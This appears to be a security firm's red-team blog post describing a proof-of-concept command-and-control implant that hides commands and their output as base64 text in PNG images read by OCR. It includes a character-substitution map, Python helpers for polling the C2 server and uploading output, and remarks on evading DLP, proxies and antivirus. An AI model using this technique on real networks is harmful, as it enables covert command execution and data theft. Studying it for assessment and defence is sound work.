#CQLabs – Implementing Proof-of-Concept C2 with Microsoft OCR

Author: Adrian Denkiewicz, Cybersecurity Expert at CQURE

During security assessments, one of the things that we always check is whether information can be extracted from the client network. This includes the ability to copy data to external drives, send it by e-mail to external addresses, or move it out over various TCP/UDP ports, non-typical protocols, or even side channels. In mature environments, dedicated DLP policies, secure proxies (proxies that are able to peek into encrypted traffic), and deep packet inspection raise the bar significantly, but they can still be bypassed by steganography and other sophisticated techniques.

There are many interesting projects, many of them open-source, that find clever ways to exfiltrate information. It is fair to say that the more popular the tool, the more likely its techniques and payloads are to be flagged by AV software. Niche projects tend to explore new ideas, and those ideas, if proven reliable, are later integrated into bigger projects.

In this article, we will cover a rather crazy idea: a PoC (Proof-of-Concept) of a PowerShell-based implant that executes commands sent in the form of PNG images. It is also able to create new images with the command output and report them back to the C2. Typical monitoring software analyzes file metadata and hidden properties, but it is unlikely to analyze the graphic content itself. The C2 could be hosted anywhere on private infrastructure, but it could also be based on popular image hosting services. In CQURE’s 1 Day to Maintain Stealth Communication Mastery we show how to reconfigure meterpreter’s reverse_http(s) module to pretend that it works with image blobs. That could easily be combined with this article’s PoC.

The most important thing: our PowerShell code will not have any external dependencies. The optical character recognition (OCR) functionality is offered by Windows itself. Although it doesn’t work as well as other solutions on the market, the fact that it’s available out of the box makes it a clear winner. The API documentation can be found here: https://docs.microsoft.com/en-us/uwp/api/windows.media.ocr. It does not offer much customization other than selecting a specific language. For the purpose of the PoC, we will use the default profile language, although on non-English systems that may not be a perfect solution.

Using Windows.Media.Ocr.OcrEngine from PowerShell isn’t straightforward. Fortunately, the https://github.com/HumanEquivalentUnit/PowerShell-Misc project has already taken care of all the necessary wrappers. Starting from that code and making some modifications, I’ve created a PowerShell module and basic test scenarios for it.

Having a PowerShell module is just the beginning, though. The methods from the original code were slightly improved: the Export-StringToPng function uses the Calibri font with an increased font size, so that the OCR function has an easier job recognizing the characters. Font family and size can be set through extra parameters if needed. There are still dozens of characters that the OCR is not able to recognize with enough accuracy. For instance, almost every special character will cause some problems. The simplest workaround? Use a limited character set. Base64-encoded strings are very good candidates, as they consist almost exclusively of alphanumeric characters.

However, even some of the alphanumeric characters look very similar in most fonts. People have a hard time distinguishing between lowercase l and 1, or between O and 0.

OCR struggles with exactly the same problem. Moreover, Microsoft’s OCR often cannot reliably tell whether an O is an uppercase or a lowercase letter. Sure, we could analyze the size of the surrounding characters, but the out-of-the-box OCR just doesn’t do that. Most of the time, the data that we’re processing is case-sensitive (base64 certainly is), so not being able to properly recognize the characters may be a serious issue.

I’ve managed to pinpoint the problematic characters and have chosen replacements for them that the OCR is able to handle. There may be better candidates, but for the purpose of this article, let’s use the following replacement map:

"l" => ".A"
"1" => ".B"
"L" => ".C"
"i" => ".D"
"I" => ".E"
"o" => ".F"
"O" => ".G"
"0" => ".H"
"w" => ".J"
"W" => ".K"
"=" => ".Q"

As you can see, the equals sign is also on the list. Depending on the input, the encoded string may have zero, one, or two = characters at the end. The last case is problematic, as the OCR may assume that it is just a stretched version of a single equals sign.

The identified characters need to be replaced before the base64 string is saved to an image, and replaced back after they are read by the OCR. Simple as that. During my tests, the OCR was able to correctly decode 100% of the base64-encoded strings.
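The substitution step can be sketched in a few lines of Python. This is only an illustration of the map above, not the module's actual code: the function names are made up for the example, and UTF-8 is assumed for the text before base64 encoding (the PowerShell side may well use a different encoding).

```python
import base64
import re

# Replacement map from the article: characters the OCR confuses are
# swapped for a dot followed by an unambiguous uppercase letter.
REPLACEMENTS = {
    "l": ".A", "1": ".B", "L": ".C", "i": ".D", "I": ".E", "o": ".F",
    "O": ".G", "0": ".H", "w": ".J", "W": ".K", "=": ".Q",
}
REVERSE = {token: char for char, token in REPLACEMENTS.items()}


def to_ocr_safe(text):
    """Base64-encode text (UTF-8 assumed) and substitute the risky characters."""
    b64 = base64.b64encode(text.encode("utf-8")).decode("ascii")
    return "".join(REPLACEMENTS.get(ch, ch) for ch in b64)


def from_ocr_safe(ocr_text):
    """Undo the substitution on OCR output and base64-decode the result."""
    compact = "".join(ocr_text.split())  # drop whitespace and line breaks
    b64 = re.sub(r"\.[A-Z]",
                 lambda m: REVERSE.get(m.group(0), m.group(0)),
                 compact)
    return base64.b64decode(b64).decode("utf-8")
```

Because the dot never occurs in plain base64 output, it works as an unambiguous escape character, and none of the replacement letters (A, B, C, D, E, F, G, H, J, K, Q) is itself on the list of problematic characters, so the substitution can be reversed in a single pass.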

Now that we have the ability to work with encoded text stored in images, we should implement basic command execution logic. We could reuse the already implemented module on the server side as well (mostly reusing the same code), but I decided to use Python instead. Although PowerShell Core is a multi-platform solution, I feel that simple Python code is still much more portable and easier to extend.

On the server side, I’ve used the PyTesseract module, which is definitely more powerful but needs to be trained for a given scenario. I’ve skipped the training part and simply started using it. The results are not always perfect, and sometimes single characters are not recognized properly, but for PoC purposes that’s still good enough.
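A minimal sketch of reading such an image with PyTesseract might look like the code below. The whitelist is not something the PoC is known to use: it is an assumption that restricting Tesseract to the characters that can actually appear (the base64 alphabet minus the replaced characters, plus the dot) could reduce misreads without training. The helper names and the choice of page segmentation mode 6 are likewise illustrative, and whitelist support depends on the installed Tesseract version and engine.

```python
import string

# Characters that never appear in the image because they are replaced
# by <dot><letter> pairs before rendering.
REPLACED = set("l1LiIoO0wW=")


def ocr_whitelist():
    """Characters that can occur in an OCR-safe string, including the dot."""
    alphabet = (string.ascii_uppercase + string.ascii_lowercase
                + string.digits + "+/")
    return "".join(c for c in alphabet if c not in REPLACED) + "."


def tesseract_config():
    """Assumed settings: one uniform block of text, restricted character set."""
    return f"--psm 6 -c tessedit_char_whitelist={ocr_whitelist()}"


def read_image(path):
    """OCR a PNG and return the recognized text with all whitespace removed."""
    # Imported lazily so the helpers above work without Pillow, pytesseract,
    # or the Tesseract binary being installed.
    from PIL import Image
    import pytesseract

    text = pytesseract.image_to_string(Image.open(path),
                                       config=tesseract_config())
    return "".join(text.split())
```

The string returned by read_image would still contain the <dot><letter> pairs, so it has to go through the reverse substitution before base64 decoding.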

Here’s how an example communication goes:

1. The server-side logic reads commands from stdin, encodes them as images, and starts serving them using a simple HTTP server.

2. The client sends a HEAD request to the C2 web server to check for a new image. If the image has been recently modified, the client downloads the new version to process. Otherwise, the client sleeps for a few seconds and tries again.

3. The downloaded image is read with the help of OCR. The command is decoded and executed using PowerShell.

4. The output of the command is encoded and written to an image. The image is sent to the server using the PUT method. The server-side code uses Tesseract to read the output, then decodes it and displays it in the console.

5. Go to 1.
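The client's part of this loop (the HEAD check, the download, and the PUT upload) can be sketched as follows. The real client is a PowerShell script; this Python version only illustrates the flow. The function names, the 5-second delay, and the use of the Last-Modified header to detect a "recently modified" image are assumptions made for the example.

```python
import time
import urllib.request
from email.utils import parsedate_to_datetime


def is_newer(last_modified, last_seen):
    """True if the Last-Modified header is later than the one already processed."""
    if last_modified is None:
        return False  # server gave no timestamp, nothing to compare
    if last_seen is None:
        return True   # first image we have ever seen
    return parsedate_to_datetime(last_modified) > parsedate_to_datetime(last_seen)


def poll_for_command(url, last_seen=None, delay=5.0):
    """Block until the image at url changes; return (png_bytes, last_modified)."""
    while True:
        head = urllib.request.Request(url, method="HEAD")
        with urllib.request.urlopen(head) as resp:
            last_modified = resp.headers.get("Last-Modified")
        if is_newer(last_modified, last_seen):
            with urllib.request.urlopen(url) as resp:
                return resp.read(), last_modified
        time.sleep(delay)  # nothing new yet, try again later


def upload_output(url, png_bytes):
    """Send the image with the command output back to the server via PUT."""
    req = urllib.request.Request(url, data=png_bytes, method="PUT",
                                 headers={"Content-Type": "image/png"})
    with urllib.request.urlopen(req) as resp:
        return resp.status
```

Checking with HEAD first keeps the idle traffic small: the image body is transferred only when the timestamp has actually changed.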

Only a few corner cases are supported. For example, when the OCR is not able to recognize the base64 string, the client sends a null request to the server, which then displays an error in the console.

The server-side code is mostly a reimplementation of the same methods in Python 3. If there are any problems decoding the response, the script tries various other methods (UTF-8 is generally used, but sometimes base64 decoding results in invalid byte sequences).
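A fallback of this kind could look roughly like the sketch below. The list of encodings tried after UTF-8 is an assumption made for illustration, as is the function name; the article does not specify which alternatives the script actually uses.

```python
import base64
import binascii


def decode_response(b64_text, encodings=("utf-8", "utf-16-le", "latin-1")):
    """Base64-decode OCR output and try several text encodings in order.

    Returns None when the input is not valid base64, for example after
    an OCR misread that broke the padding or introduced a stray character.
    """
    try:
        raw = base64.b64decode(b64_text, validate=True)
    except (binascii.Error, ValueError):
        return None
    for encoding in encodings:
        try:
            return raw.decode(encoding)
        except UnicodeDecodeError:
            continue  # invalid byte sequence for this encoding, try the next
    # Only reached if every listed encoding failed: keep what can be read.
    return raw.decode("utf-8", errors="replace")
```

For example, decode_response("aGVsbG8gd29ybGQ=") returns "hello world", while a string that is not valid base64 yields None, which the caller can report as an error in the console.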

The simplest example of the generated image is:

The <dot><letter> pairs must be replaced with their predefined values, and then the string is base64-decoded to get the original value. It decodes to the string hello world, the result of the echo hello world command sent from the C2.

This is how an example session goes:

As you can see, these commands were successfully executed on the client-side, but the responses were not completely recognized by the server-side code. That’s something that can be fixed if Tesseract is better trained for the given scenario. http://trainyourtesseract.com/ could be used to train Tesseract using custom fonts.

Techniques like these may be particularly useful in non-typical environments or scenarios where traffic is heavily restricted. OCR-based communication may not guarantee enough integrity, but the technique is rather interesting and, on the client-side, uses only built-in features. The scripts are rather trivial to understand and easy to extend.

Perhaps we should now see if Microsoft’s Speech Synthesis and Recognition understand each other?

Adrian Denkiewicz, Cybersecurity Specialist at CQURE, Ethical Hacker, Penetration Tester, Red Teamer, Software Developer and Trainer. Adrian is deeply interested in the offensive side of security, ranging from modern web attacks, through operating system internals, to low-level exploit development. He is passionate about learning a bit of everything, but mostly things related to astronomy and rocket science. Adrian has even completed an online rocket science course!
